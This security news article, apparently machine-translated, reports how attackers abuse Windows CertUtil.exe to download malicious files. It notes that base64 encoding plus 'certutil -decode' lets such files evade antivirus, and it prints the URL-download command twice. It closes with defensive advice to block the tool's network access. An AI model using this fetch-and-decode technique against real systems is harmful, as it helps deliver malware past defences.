Home
Tech info
Technology
Science
Life
Application
Electric
Program
Mobile
Windows 10
Windows 11CertUtil.exe allows an attacker to download malicious code and bypass antivirus software
Windows has an integrated software called CertUtil for managing certificates in Windows. Using CertUtil you can install, backup, delete, manage, perform certification-related functions in Windows.
One of CertUtil's features is to download the certificate or any related file from the URL and save it on the computer using certutil.exe -urlcache -split -f [URL] output.file .
In 2017, security researcher Casey Smith warned of using this method to download malicious code. In 2016 it was taken advantage of and last March there was a Trojan that used it to download a series of files and scripts to the computer.
The attacker still uses CertUtil because some computers are still locked, not allowing strange software to download files. Using Windows built-in software will help to be whitelisted and allowed to download files.
CertUtil is used on a recent trojan
Use CertUtil + Base64 to bypass antivirus software
Security consultant Xaview Mertens recently released a new way to use CertUtil, whereby base64 will first encrypt the malicious file to be identified as harmless, then decrypt it after being downloaded by CertUtil.exe.
Command to download files with CertUtil:
certutil.exe -urlcache -split -f [URL] output.file
MalwareHunterTeam indicates that certutil.exe -decode has been used in practice. F5 Labs also details a campaign using CertUtil.exe to install a virtual money digging tool. Fabio Assolini from Kaspersky also warned that this method was used in Brazil.
Every day there are always new tricks to exploit the programs that are legal, secure on Windows. If you do not use CertUtil to access the certificate or remote server, you should lock the network connectivity of this tool.
See more:
- Warning of new malware appear like Wannacry, capable of deleting Vietnamese percussion on computer
- What to do when the computer is infected with a virus that fights virtual money?
- Plugins on well-known editing tools can give hackers priority
Micah SotoYou should read it
- What to do when the computer is infected with a virus that fights virtual money?
- VNCERT issued an emergency alert warning malicious code exploiting Coinhive virtual money
- Warning: a new variant of the virus that fills virtual money via Facebook Messenger will appear every 10 minutes
- Warning: A new code of virtual money training is spreading strongly in Vietnam
- After WannaCry, Petya's 'extortion' malicious code is raging, this is a remedy to prevent
- Warning: New variants of malicious code digging on Facebook threaten users in Vietnam
- Discover a new kind of malicious code that can record the phone call to extort money
- The malware owner earned $ 63,000 from digging Monero on the IIS server
May be interested
- Warning: GandCrab extortionist code is attacking Vietnam
a campaign to distribute blackmail gandcrab attacks many countries around the world, including vietnam, discovered by the vietnam computer emergency response center (vncert, ministry of information and communications). - Appearing dangerous Android malicious code specializing in stealing chat content on Facebook Messenger, Skype ...a type of malware that has a package name is com.android.boxa that can steal users' private chat data on current messaging applications such as facebook messenger, skype, etc., by experts from the company. network security trustlook detected on android operating system.
- Warning: Detecting more than 1000 Cisco router and switch devices in Vietnam has a serious security errorthere are more than 1000 cisco router and switch devices in vietnam (all devices used in large network environments and core systems) are subject to serious security errors.
- A series of cult videos, billions of views on YouTube were hacked, renamed and deleteddespacito song mv over 5 billion views of singer luis fonsi on newly grouped youtube hacker by prosox changed to hacked by prosox & kuroi'sh & shade & akashi it & kiraroot & xepher & senpaiweb & misao ..., photo the cover was replaced by a group of red shirts, masks and guns.
- Ransomware appears to require users to play PUBG for 1 hour instead of ransompubg ransomware without ransom requires that players play bluehole's popular game within an hour to unlock their data.
- Warning of donkey by accepting money on Facebookwhitehat, the vietnamese cyber security community has posted warnings to warn users, avoiding trapping frauds to receive money through social networks facebook is booming in vietnam at the end of the year.
Attack the network
Most Android anti-virus software cannot detect malicious APK files- Fileless malware - Achilles heel of traditional antivirus software
- How to kill virus automatically delete Unikey, Vietkey, Zalo on the computer
- Malware Judy attacked more than 36.5 million Android phones
- Top free antivirus software for iPhone 2023
Most Android anti-virus software cannot detect malicious APK files
Fileless malware - Achilles heel of traditional antivirus software
How to kill virus automatically delete Unikey, Vietkey, Zalo on the computer
Malware Judy attacked more than 36.5 million Android phones
Top free antivirus software for iPhone 2023